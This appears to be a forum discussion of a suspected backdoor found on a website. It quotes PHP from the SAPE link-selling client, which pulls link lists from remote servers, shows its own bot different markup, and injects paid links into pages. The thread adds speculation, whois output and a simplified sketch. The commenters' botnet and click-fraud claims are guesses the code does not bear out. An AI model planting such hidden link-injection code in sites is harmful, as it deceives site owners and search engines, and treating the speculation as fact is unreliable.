@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
@curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = @curl_exec($ch)) {
return $data;
}
@curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Cannot connect to server: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = @fopen($filename, 'rb');
@flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = @filesize($filename);
$mqr = @get_magic_quotes_runtime();
@set_magic_quotes_runtime(0);
if ($length) {
$data = @fread($fp, $length);
}
else {
$data = '';
}
@set_magic_quotes_runtime($mqr);
@flock($fp, LOCK_UN);
@fclose($fp);
return $data;
}
return $this->raise_error('Cannot read data from file: ' . $filename);
}
function _write($filename, $data) {
$fp = @fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
@fwrite($fp, $data, $length);
@flock($fp, LOCK_UN);
@fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
@unlink($filename);
return $this->raise_error('Data integrity violated while writing to file: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Cannot write data to file: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (@touch($this->_db_file)) {
@chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('File ' . $this->_db_file . ' does not exist and could not be created. Set permissions 777 on the folder.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('No write access to file: ' . $this->_db_file . '! Set permissions 777 on the folder.');
}
@clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
@unserialize($data) == false
)
)
) {
@touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = @unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = @serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(@unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = @iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (@array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
// Replace all entities with their characters
$special_chars = array(
'&amp;' => '&',
'&quot;' => '"',
'&#039;' => '\'',
'&lt;' => '<',
'&gt;' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|(&nbsp;))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
// If there is at least one sape_index pair, start working
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (@array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>

Sape is apparently a link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the Sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google translation of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
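
For reference, the part of the posted code that is easiest to follow is replace_in_page(): it splits the page on <sape_index> markers and passes the text between them to replace_in_text_segment(), which swaps stored sentences for replacement text. Below is a minimal sketch of that splitting step only. The function names replace_segment_sketch and replace_in_page_sketch, the sample page, and the example.com URL are made up for illustration, and the inner replacement is a plain string swap rather than the regex matching the original uses.

```php
<?php
// Hypothetical stand-in for replace_in_text_segment(): swaps a known
// phrase for a version that contains a link. Phrase and URL are invented.
function replace_segment_sketch(string $segment, array $replacements): string
{
    foreach ($replacements as $plain => $linked) {
        // Replace only the first occurrence, mirroring the limit of 1
        // that the posted code passes to preg_replace().
        $pos = strpos($segment, $plain);
        if ($pos !== false) {
            $segment = substr_replace($segment, $linked, $pos, strlen($plain));
        }
    }
    return $segment;
}

// Hypothetical, simplified version of replace_in_page().
function replace_in_page_sketch(string $buffer, array $replacements): string
{
    // Same pattern as the posted code. Without PREG_SPLIT_DELIM_CAPTURE the
    // markers are dropped, so odd indexes hold the text between the markers.
    $parts = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
    for ($i = 1; $i < count($parts); $i += 2) {
        $parts[$i] = replace_segment_sketch($parts[$i], $replacements);
    }
    return implode('', $parts);
}

$page = 'Header <sape_index>Buy cheap widgets today.</sape_index> Footer';
$out = replace_in_page_sketch($page, [
    'cheap widgets' => '<a href="http://example.com/">cheap widgets</a>',
]);
echo $out, "\n";
```

With the sample page above this prints the text with the phrase turned into a link and the markers removed; text outside the markers is left alone.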

My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david@archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david@archtower ~]$

At first glance, it looks like something that automatically visits ad referral links.
